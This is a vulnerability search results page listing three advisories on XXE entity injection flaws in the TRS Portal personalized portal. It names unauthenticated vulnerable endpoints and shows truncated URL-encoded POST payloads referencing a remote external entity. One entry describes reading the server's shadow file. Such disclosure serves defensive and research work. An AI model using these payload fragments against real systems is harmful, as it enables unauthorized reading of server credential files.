Lucene search
K

3 matches found

CNVD
CNVD
added 2016/11/03 12:0 a.m.3 views

XXE Vulnerability in TRS Portal Personalization Portal

TRS Portal for TORS company developed a set of completely based on J2EE and browser technology, personalized portal general-purpose software. TRS Portal personalized portal ServiceControler Servlet can be accessed without logging in, and there is a XXE entity injection vulnerability. This...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2015/11/20 12:0 a.m.23 views

TRS portal个性化门户任意文件读取(二)

简要描述: 发现portal个性化门户其他链接实体注入漏洞 详细说明: TRS Portal个性化门户 http://XX.XX.XX.XX/portal/help/wcmhelpaddeditdowith.jsp链接未对外部实体进行过滤,可调用外部实体进行解析,可任意读取服务器上任意文件 漏洞证明: 漏洞利用过程: http://XX.XX.XX.XX/portal/help/wcmhelpaddeditdowith.jsp POST请求:ObjectXML=%0d%0a%20%20%25remote;%0d%0a%5D%0d%0a...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2015/11/04 12:0 a.m.19 views

TRS portal个性化门户xxe实体注入漏洞

简要描述: 对外部实体调用检查不严格导致可解析外部实体 详细说明: TRS portal个性化门户http://XX.XX.XX.XX/portal/auth/regnewuserdowith.jsp链接未对外部实体进行过滤,可调用外部实体进行解析,可任意读取服务器上任意文件。 漏洞证明: 漏洞利用过程:http://XX.XX.XX.XX/portal/auth/regnewuserdowith.jsp POST请求: ObjectXML=%0d%0a%20%20%25remote;%0d%0a%5D%0d%0a poc.xml读取目标机上的shadow文件,并写入网站日志中:...

7.1AI score
Exploits0
Rows per page
Query Builder